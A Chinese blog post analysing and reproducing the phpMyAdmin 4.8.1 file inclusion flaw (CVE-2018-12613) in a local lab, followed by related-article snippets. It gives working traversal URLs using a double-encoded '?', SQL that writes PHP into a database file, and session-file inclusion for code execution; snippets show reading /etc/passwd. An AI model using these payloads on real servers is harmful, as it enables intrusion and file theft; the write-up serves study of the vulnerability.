phpmyadmin 4.8.1 远程文件包含漏洞

最新推荐文章于 2024-02-16 01:08:24 发布
最新推荐文章于 2024-02-16 01:08:24 发布
阅读量776 收藏 2
点赞数
分类专栏: Hacker Way 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45650712/article/details/108015022
版权

phpmyadmin 4.8.1 远程文件包含漏洞

文章目录

一、漏洞详情

在这里插入图片描述

首先在index.php 50-67行代码
在这里插入图片描述
满足5个条件后就会include$_REQUEST[‘target’]的内容

$_REQUEST[‘target’]不为空
$_REQUEST[‘target’]是字符串
$_REQUEST[‘target’]不以index开头
R E Q U E S T [ ′ t a r g e t ′ ] 不 在 _REQUEST['target']不在 REQUEST[target]target_blacklist中
‘import.php’, ‘export.php’
Core::checkPageValidity($_REQUEST[‘target’])为真
代码在libraries\classes\Core.php 443-476行
在这里插入图片描述

$whitelist一开始未传参过来,所以会被赋值为self::$goto_whitelist`

在这里插入图片描述
在这里插入图片描述
如果$page在白名单中就会直接return true,但这里考虑到了可能带参数的情况,所以有了下面的判断
在这里插入图片描述

mb_strpos ( string $haystack , string $needle [, int $offset = 0 [, string $encoding = mb_internal_encoding() ]] ) : int
查找 string 在一个 string 中首次出现的位置。基于字符数执行一个多字节安全的 strpos() 操作。 第一个字符的位置是 0,第二个字符的位置是 1,以此类推。
p a g e 是 取 出 _page是取出 pagepage问号前的东西,是考虑到target有参数的情况,只要$_page在白名单中就直接return true
但还考虑了url编码的情况,所以如果这步判断未成功,下一步又进行url解码

在这里插入图片描述

所以传入二次编码后的内容,会让checkPageValidity()这个函数返回true,但index中实际包含的内容却不是白名单中的文件
例如传入
?target=db_datadict.php%253f
由于服务器会自动解码一次,所以在checkPageValidity()中, p a g e 的 值 一 开 始 会 是 d b d a t a d i c t . p h p 但 在 i n d e x . p h p 中 page的值一开始会是db_datadict.php%3f,又一次url解码后变成了db_datadict.php?,这次便符合了?前内容在白名单的要求,函数返回true 但在index.php中 pagedbdatadict.phpindex.php_REQUEST[‘target’]仍然是db_datadict.php%3f,而且会被include,通过目录穿越,就可造成任意文件包含

二、漏洞复现

1.任意文件包含

通过目录穿越包含任意文件
?target=db_datadict.php%253f/…/…/…/…/…/…/…/…/…/Windows/DATE.ini

在这里插入图片描述

2.任意代码执行

包含数据库文件
先执行SQL语句查询一下数据库路径
show global variables like “%datadir%”;
在这里插入图片描述

3.向数据库写入php代码

CREATE DATABASE rce;
use rce;
CREATE TABLE rce(code varchar(100));
INSERT INTO rce(code) VALUES("<?php phpinfo(); ?>");

在这里插入图片描述
然后包含该数据库文件
http://127.0.0.1/phpMyAdmin4.8.1/index.php?target=db_datadict.php%253f/…/…/…/…/…/…/…/…/…/phpStudy/PHPTutorial/MySQL/data/rce/rce.MYD
在这里插入图片描述

4.包函session文件

session路径的视环境而定
SELECT ‘<?php phpinfo()?>’;
在这里插入图片描述
在这里插入图片描述
然后访问http://127.0.0.1/phpMyAdmin4.8.1/index.php?target=db_datadict.php%253f/…/…/…/…/…/…/…/…/…/phpStudy/PHPTutorial/tmp/tmp/sess_a5ao2g5pisd58uv17rqq5665fh

三、我的公众号

后续操作请持续关注哦!!!
了解更多请关注下列公众号:
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗
在这里插入图片描述
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗

永不垂头
关注
专栏目录
phpMyAdmin 4.8.1 远程文件包含漏洞复现
不想当脚本小子的脚本小子
04-04 1141
0x01 漏洞简介 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在phpMyAdmin 4.8.2 之前的 4.8.x 版本中,其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 影响范围 phpMyAdmin 4.8.0 phpMyAdmin 4.8.1 0x02 漏洞环境 使用vulnhub快速搭建靶场 bash cd /vulhub/phpmyadmin/CVE-2018-12613 sudo docker-comp
phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)复现
ximo的博客
03-22 1057
CVE-2018-12613 简介: phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 搭建环境: 使用docker+vulhub的环境。 复现过程: 访问: index.php?target=db_sql.php%253f/…/…/…/…/…/…/…/…/etc/passwd 可以查看到文件信息: 说明存在文件包含。 在sql中执行SELECT '<?=phpinfo()?&gt
phpMyAdmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)
网络安全。
01-18 1970
0x01 简介 phpMyadmin 4.8.1版本的index.php中存在文件包含漏洞,通过二次编码可绕过过滤。 0x02 漏洞复现 1.将?进行两次URL编码为&quot;%253f&quot;,构造下列payload: http://xxx:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 漏洞存在。 2.在S...
phpmyadmin4.8.1远程文件包含漏洞(CVE-2018-12613)
weixin_63231007的博客
10-08 2871
_REQUEST['target'] 搜索数组$target_blacklist 中不存在指定的值( ‘import.php’, ‘export.php’)target=db_sql.php%253f/../../../../../../../../../../tmp/sess_[session]target=db_sql.php%253f../../../../../../../../flag 得到flag。$_REQUEST['target'] 参数携带的内容是字符串。
phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)
EC_Carrot的博客
07-20 225
漏洞简介 phpMyAdminphpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 phpMyAdmin 4.8.2之前的4.8.x版本中存在安全漏洞。攻击者可利用该漏洞包含(查看并可能执行)服务器上的文件。 漏洞复现 访问http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 可见
CVE-2018-12613 phpmyadmin 4.8.1 远程文件包含漏洞
weixin_51387754的博客
12-07 2820
漏洞简介 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞漏洞环境 执行如下命令,启动phpmyadmin 4.8.1: docker-compose up -d 环境启动后,访问http://your-ip:8080,即可进入phpmyadmin。配置的是“config”模式,所以无需输入密码,直接登录test账户。 漏洞复现 访问http://your-ip:8080/index.ph
phpmyadmin4.8.1远程文件包含漏洞(CVE-2018-12613)-hctf218-warmup
Sea_Sand息禅
06-15 2117
用hctf2018的一道题可以重现改漏洞。 根据源码提示进入source.php中,可以拿到源码。 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = [...
phpMyAdmin远程文件包含漏洞CVE-2018-12613深度分析
"phpmyadmin 远程文件包含漏洞(CVE-2018-12613)" 本文将详细解析PHPMyAdmin中的远程文件包含漏洞(CVE-2018-12613),这是一个严重影响该开源MySQL数据库管理工具安全性的漏洞PHPMyAdmin是一个广受欢迎的Web...
phpmyadmin 4.8.1 (CVE-2018-12613)
玄道的网安博客
06-11 928
简介 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 影响版本 phpMyAdmin 4.8.0和4.8.1 漏洞分析 我们先下载源码 wgethttps://files.phpmyadmin.net/phpMyAdmin/4.8.1/phpMyAdmin-4.8.1-all-languages.zip 进行解压 nzip phpMyAdmin-4.8.1-all-la.
[CVE-2018-12613]phpmyadmin4.8.1远程文件包含漏洞复现
https://www.cnblogs.com/zpchcbd/
08-31 531
漏洞原理: 一个攻击者可以在服务器上包含(查看和潜在执行)文件的漏洞被发现。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。攻击者必须经过身份验证,但在这些情况下除外: $ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码 $ cfg [‘S...
基于PHP的adminerv4.8.1取代phpmyadmin的在线管理mysql好工具源码.zip
07-29
基于PHP的adminerv4.8.1取代phpmyadmin的在线管理mysql好工具源码.zip
记一次phpmyadmin 4.8.1 远程文件包含漏洞(BUUCTF web)
ancan8807的博客
07-28 417
题目很简单,一个滑稽 打开源码,发现存在source.php文件 于是访问文件,发现出现一串php源码 提示存在hint.php,于是访问发现一句话 flag not here, and flag in ffffllllaaaagggg 再回过头来观察source.php明显是一道代码审计的问题,其中存在4个限制条件 $_REQUEST['f...
文件包含漏洞--phpMyAdmin 4.8.1
最新发布
xiesiyuan1的博客
02-16 1221
需要同时满足条件(参数target不为空、是字符串、不以index开头(此时如果需要加载index文件去绕过,可尝试使用xxx/../index.php)、不在数组target_blacklist中(此处也可以用xxx/../index.php的方式绕过 )、在checkPageValidity()函数中返回真)才能得到参数。因为此靶场可以对数据库直接操作,我们可以直接查找数据库文件(/MySql/data/数据库名/表名.frm),并且直接新建表,将字段名命名为一句话木马,从而将一句话木马包含进去。
phpMyAdmin 4.8.1 本地文件包含漏洞复现
weixin_51681694的博客
04-22 752
漏洞点在根目录下的index.php中的61行target传参可任意控制,控制index.php包含任意文件上面的if条件需要满足target且为且且中黑名单:查看最后一个条件,需要返回true第一个红框定义白名单第二个红框检查文件名是否在白名单中,在则返回true第三个红框将原传入字符串从0到?前分割出来,再检查字符串是否在白名单中,在则返回true可以考虑设置字符串内容?之前的字符串为白名单,绕过过滤,可是?不能出现在文件名中最后则是利用点。
phpmyadmin 4.8.1任意文件包含(CVE-2018-12613)
笑花大王
03-27 374
简介 环境复现:https://gitee.com/xiaohua1998/hctf_2018_warmup 考察知识点:文件包含漏洞(phpmyadmin 4.8.1任意文件包含) 线上平台:榆林学院内可使用协会内部的网络安全实验平台 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑, 通过二次编码即可绕过检查,造成远程...
phpMyAdmin4.8.1漏洞复现及利用
qq_43579362的博客
09-08 2316
一.环境配置 我采用的是Windows+phpstudy配置的运行环境,将phpMyAdmin4.8.1下载好解压到phpstudy网站根目录即可,这里需要注意的是php版本和Mysql的版本 配置好后,直接访问http://localhost/phpMyAdmin 登陆成功成功后你会遇到下图 解决方法: 修改phpMyAdmin/libraries文件下的config.default.php里面的$cfg['blowfish_secret']配置,随意修改保存即可,长度一定要达到要求。 二.漏洞
phpMyAdmin 4.8.1后台文件包含漏洞(CVE-2018-12613)
qq_45521281的博客
04-27 3914
这篇文章将分享一个phpMyAdmin 4.8.1版本的文件包含漏洞,从配置到原理,再到漏洞复现进行讲解,更重要的是让大家了解这些真实漏洞背后的知识。 文章目录一.phpMyAdmin二.phpMyAdmin基础用法三.漏洞原理四.phpMyAdmin漏洞复现 一.phpMyAdmin phpMyAdmin是一种MySQL数据库的管理工具,安装该工具后,即可通过Web形式直接管理MySQL数据,而...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值